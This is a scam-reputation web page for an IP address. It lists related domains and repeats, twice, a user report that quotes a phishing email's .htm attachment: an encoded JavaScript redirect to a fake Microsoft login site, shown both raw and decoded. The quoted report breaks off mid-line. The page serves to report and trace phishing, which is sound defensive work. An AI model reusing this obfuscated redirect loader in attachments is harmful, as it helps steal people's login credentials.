Scam Detective
Domain

153.149.177.150

First seen Feb 22, 2026

Suspicious
  • No SSL certificate
  • 2 community reports from users
Domain: 153.149.229.85 — Suspicious, 0 complaints153.149.229…Domain: zo.hen88-dif09.xyz — Suspicious, 0 complaintszo.hen88-di…Domain: katoh-net.ac.jp — Suspicious, 0 complaintskatoh-net.a…Domain: 153.149.229.77 — Suspicious, 0 complaints153.149.229…Domain: 153.149.177.150 — Suspicious, 0 complaintsDomain153.149.177.1…High RiskSuspiciousConsumer ComplaintsLow Activity
Showing the 4 highest-risk connections; 14 more in this cluster. Each line is a "reported together" relationship.

Details

First Seen
2/22/2026

Related Domains

domain

153.149.229.85

reported togetherdomain

zo.hen88-dif09.xyz

reported togetherdomain

katoh-net.ac.jp

reported togetherdomain

153.149.229.77

reported togetherdomain

153.149.229.86

reported togetherdomain

mwpremgw2.ocn.ad.jp

reported togetherdomain

153.149.229.84

reported togetherdomain

153.149.229.89

reported togetherdomain

153.149.229.72

reported togetherdomain

153.149.229.76

reported togetherdomain

153.149.229.75

reported togetherdomain

153.149.229.74

reported togetherdomain

ofmgw0231.ocn.ad.jp

reported togetherdomain

104.168.163.212

reported togetherdomain

153.149.229.87

reported togetherdomain

153.149.229.73

reported togetherdomain

103.86.99.99

reported togetherdomain

153.149.229.88

reported together

Community Reports

How might someone find out who a phishing email is from I'm a 2/10 on technical proficiency, and a 10/10 on wanting to get this done. &#x200B; Basically, my boss got a slew of emails over the last couple days from individuals with b/s email addresses, one from @ [katoh-net.ac.jp](https://katoh-net.ac.jp) email, with an .htm attachment, which opened in word gives: <script language="javascript">document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%3E%0D%0A%3C%68%74%6D%6C%20%6C%61%6E%67%3D%22%65%6E%2D%55%53%22%3E%0D%0A%20%20%20%20%3C%68%65%61%64%3E%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%20%3D%20%22%68%74%74%70%73%3A%2F%2F%7A%6F%2E%68%65%6E%38%38%2D%64%69%66%30%39%2E%78%79%7A%2F%3F%65%3D%59%6E%4A%35%59%58%-----------------------------------------------%3D%22%0D%0A%20%20%20%20%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0D%0A%3C%2F%68%74%6D%6C%3E' ) );</script> &#x200B; decoded thats: <script language="javascript">document.write( unescape( '<!DOCTYPE HTML> <html lang="en-US"> <head> <script type="text/javascript"> window.location.href = "\[https://zo.hen88-dif09.xyz/?e=YnJ5YX%------------------------------\*=\](https://zo.hen88-dif09.xyz/?e=YnJ5YX%\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*=)" </script> </html>' ) );</script> &#x200B; &#x200B; &#x200B; Sorry for all the --------------------- censering it, but the full thing actually includes some of the boss's info. &#x200B; sure enough, if you open the attachment it leads you to a fake Microsoft login screen (doesn't even mask the url). &#x200B; Source code confirms a bunch of css/php, but I can't figure out who its actually going to other than the xyz site. &#x200B; &#x200B; Here's the important parts I guess: &#x200B; <!-- saved from url=(0041)\[https://zo.hen88-dif09.xyz/main/ma

1939 days ago1 upvote

How might someone find out who a phishing email is from I'm a 2/10 on technical proficiency, and a 10/10 on wanting to get this done. &#x200B; Basically, my boss got a slew of emails over the last couple days from individuals with b/s email addresses, one from @ [katoh-net.ac.jp](https://katoh-net.ac.jp) email, with an .htm attachment, which opened in word gives: <script language="javascript">document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%3E%0D%0A%3C%68%74%6D%6C%20%6C%61%6E%67%3D%22%65%6E%2D%55%53%22%3E%0D%0A%20%20%20%20%3C%68%65%61%64%3E%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%20%3D%20%22%68%74%74%70%73%3A%2F%2F%7A%6F%2E%68%65%6E%38%38%2D%64%69%66%30%39%2E%78%79%7A%2F%3F%65%3D%59%6E%4A%35%59%58%-----------------------------------------------%3D%22%0D%0A%20%20%20%20%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0D%0A%3C%2F%68%74%6D%6C%3E' ) );</script> &#x200B; decoded thats: <script language="javascript">document.write( unescape( '<!DOCTYPE HTML> <html lang="en-US"> <head> <script type="text/javascript"> window.location.href = "\[https://zo.hen88-dif09.xyz/?e=YnJ5YX%------------------------------\*=\](https://zo.hen88-dif09.xyz/?e=YnJ5YX%\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*=)" </script> </html>' ) );</script> &#x200B; &#x200B; &#x200B; Sorry for all the --------------------- censering it, but the full thing actually includes some of the boss's info. &#x200B; sure enough, if you open the attachment it leads you to a fake Microsoft login screen (doesn't even mask the url). &#x200B; Source code confirms a bunch of css/php, but I can't figure out who its actually going to other than the xyz site. &#x200B; &#x200B; Here's the important parts I guess: &#x200B; <!-- saved from url=(0041)\[https://zo.hen88-dif09.xyz/main/ma

1939 days ago1 upvote

Share Your Experience

What's Your Exposure?

Know your risk exposure to this message with a Thorough Analysis. It returns a detailed report covering the complaint history, your data breach exposure, related scam entities, and risk signals tied to this email message. Check the box and enter your email address now.